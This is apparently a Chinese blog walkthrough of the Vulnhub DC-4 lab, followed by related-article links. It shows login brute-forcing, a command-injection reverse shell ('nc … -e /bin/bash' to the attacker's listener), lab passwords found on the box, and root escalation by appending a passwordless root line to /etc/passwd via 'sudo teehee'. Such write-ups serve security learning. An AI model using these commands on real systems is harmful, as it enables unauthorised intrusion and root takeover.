信息收集

只开了两个端口:22,80
访问网站,只是个登录页,中间件也没什么可用漏洞

尝试爆破,用户就是admin,Admin,administrator
密码找字典。
过程不演示了,burp的模块,或者自己写都可以,但是注意,无论密码错与对状态码都是302,判断条件要设置成返回的字节大小。
用户名是admin,密码是happy
登录,功能只有三个,大概就是在命令行执行三个固定命令

在前端修改执行的命令(如果要用burp抓数据包我看那个空格应该要用加号代替),在你攻击机上监听4444端口

nc 192.168.83.128 4444 -e /bin/bash

反弹成功,将会话变成交互式

肯定是要提权的,先看suid,系统版本,发现没什么问题
翻翻目录,有三个用户,第二个用户目录下有个备份文件,密码文件,应该是jim的,上面扫到22端口,连接ssh

kail上一个应用密码爆出来了

jibril04


还是看别人文章才发现的,这提示。。。

在/var/mail下

Charles的密码:^xHhA&hvim0y

ssh还是什么密码,

切换到charles用户

sudo -l#查看能用什么root权限下的命令,不用密码的那种


teehee -a 在文件后面追加内容但是不覆盖
echo “admin::0:0:::/bin/bash” | sudo teehee -a /etc/passwd#就是在/etc/passwd文件末尾加一行,作用是添加了一个无密码用户,权限root

切换用户即可(不知道为什么charles切换一直问我要密码,换到www-data那个窗口才成功)

总结

提示很少,很多东西都不知道,还是学的太少了

【Vulnhub】DC-4相关推荐

  1. 【转载】DC/OS关键技术与应用场景

    [转载]DC/OS关键技术与应用场景 2017-02-20 张基恒 亦庄小分队 作者简介  作者简介 张基恒(1990-),女,中国联合网络通信有限公司研究院工程师,主要从事大数据.IT架构方面的研究 ...

  2. 【vulnhub】靶机- [DC系列]DC9(附靶机))

    主机信息 Kali:192.168.56.113 DC9:192.168.56.112 实验过程 先进行主机探测,查找靶机的IP地址: arp-scan --interface eth1 192.16 ...

  3. 【Vulnhub】之JIS-CTF-VulnUpload-CTF01

    一. 部署方法 在官网上下载靶机ova环境:http://www.mediafire.com/file/t5b4nkynxkm9hj2/CTF01.ova 使用VMware搭建靶机环境 攻击机使用VM ...

  4. 【Vulnhub】之Deathnote

    一. 部署方法 在官网上下载靶机ova环境:https://download.vulnhub.com/deathnote/Deathnote.ova 使用VMware搭建靶机环境 攻击机使用VMwar ...

  5. 【Vulnhub】之Nagini

    一. 部署方法 在官网上下载靶机ova环境:https://download.vulnhub.com/harrypotter/Nagini.ova 使用VMware搭建靶机环境 攻击机使用VMware ...

  6. 【Vulnhub】搭建Vulnhub靶机

    一.Vulnhub介绍 Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的. 二.下载 去vulnhub的官网 https://ww ...

  7. 【Vulnhub】Five86-2

    Description Five86-2 is another purposely built vulnerable lab with the intent of gaining experience ...

  8. 【vulnhub】Raven2

  9. 【VulnHub】JIS-CTF

    实验环境: 靶机:192.168.0.149 攻击机kali:192.168.0.103 一.信息收集 1.masscan快速扫端口,发现22,80端口. root@redwand:~# massca ...

  10. 【VUlnhub】Tr0ll+Dr4g0n b4ll

    Tr0ll 开了三个端口21,22,80 先访问网站 没啥,扫一下目录 试试ftp的匿名登录 用户名anonymous 无密码 匿名文件传输能够使用户与远程主机建立连接并以匿名的身份从远程主机上拷贝文 ...

最新文章

  1. 由1433端口入侵,浅谈sqlserver安全 (转)
  2. CentOS 6.3 下用ntfs-3g挂载Windows NTFS分区
  3. 02年六代雅阁的整备质量_2020年宝安第八批更新计划:联投地产5.4万㎡“工改”项目...
  4. 微软官方Windows主题 英国之美 高分辨率的壁纸
  5. Ubuntu 13.04 双显卡安装NVIDIA GT 630M驱动
  6. swift. 扩展类添加属性_Swift快速为类扩展属性
  7. 剑指 Offer II 036. 后缀表达式
  8. 腾讯云技术复盘「数据丢失事件」,为什么业务上云还要再做云备份?
  9. PLC 数据内存读写 调试软件工具
  10. js 让鼠标右下角有一排小字_JS实现跟随鼠标的链接文字提示框效果
  11. ipa文件安装到ios系统
  12. 计算机开机最快,电脑开机速度,最快几秒?
  13. linux系统下的微信安装(ubuntu20.04)
  14. C#PC与三菱Q系列PLC通信小实验中遇到的问题
  15. 龙芯IPC追平Zen2 稳步推进产业生态
  16. macOS更新10.14.6 更新到macOS Monterey
  17. TexStudio提示:无法启动build view xelatex
  18. htc+m8+wp+android,WP8.1版HTC One M8官方配置全揭晓
  19. 凯文凯利10条人生建议,送给迷茫的你!(上)
  20. php跨域header处理

热门文章

  1. 低压铸造,生产周期减少16秒是如何做到的?
  2. 平安科技Python面试题分析
  3. 使用JQuery完成网上商城的制作
  4. 智能+,见未来:「易观方舟智能用户运营产品套件」全新升级
  5. intel945显卡linux驱动,ubuntu 9.10 compiz 3d 桌面安装(intel 945显卡)
  6. 【送书】Excel是最牛的数据分析工具,不接受反驳!
  7. picsart旧版本_picsart旧版本
  8. java通过网易邮箱发送邮件
  9. oppoA83怎么升级android版本,OPPO A83 A1刷机教程_OPPO A83 A1卡刷升级更新官方系统包...
  10. C++学习(一)_应用环境的搭建